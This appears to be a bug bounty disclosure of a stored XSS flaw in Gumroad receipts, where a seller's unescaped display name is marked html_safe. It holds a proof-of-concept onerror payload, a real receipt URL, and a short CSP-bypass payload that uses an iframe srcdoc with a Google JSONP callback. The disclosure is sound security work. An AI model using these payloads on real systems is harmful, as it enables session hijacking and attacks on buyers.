Stored XSS via User Name in Receipt 'Product Questions' Note

Vulnerability: Stored Cross-Site Scripting (XSS)

Location: Receipt generation (Product Questions Note)

Source: User.name field (controllable by users/sellers via profile settings, e.g., /settings/profile).

Sink:

1. The display_name method in /app/app/models/user.rb:408 returns the user's name if present.
2. The product_questions_note method in /app/app/presenters/receipt_presenter/charge_info.rb:34 interpolates seller.display_name into a string containing a mail_to link.
3. This entire string is marked html_safe ("#{question} #{action}".html_safe).
4. The result is assigned to charge_info.product_questions_note.
5. This note is rendered without escaping using <%= charge_info.product_questions_note %> in /app/app/views/customer_mailer/receipt/sections/_items.html.erb:11, which is part of the receipt email/web view.

Exploitation:

1. A seller goes to their profile settings.
2. They set their 'Name' field to an XSS payload, e.g., <img src=x onerror=alert('XSS-DisplayName')>.
3. A user purchases a product from this seller.
4. When the user views the receipt (web or email), the 'Questions about this product?' section renders the seller's name unsanitized, executing the script.

Impact: Allows sellers to execute arbitrary JavaScript in the context of users viewing receipts for their products. This can lead to session hijacking, phishing, or other attacks against buyers.

Recommendation: HTML-escape the seller.display_name before interpolating it into the string in charge_info.rb, or ensure the output of product_questions_note is escaped where it's rendered in the view (e.g., use h() or remove the .html_safe). Escaping the name before interpolation is generally safer.

[msrkp]

https://gumroad.com/purchases/7AhL7umVp-mIUs8gsBBmLw==/receipt?email=a%40a.com

csp bypass, should be less than 100 len

<iframe srcdoc=<script src=//www.google.com/complete/search?client=chrome&callback=alert#"></script>>```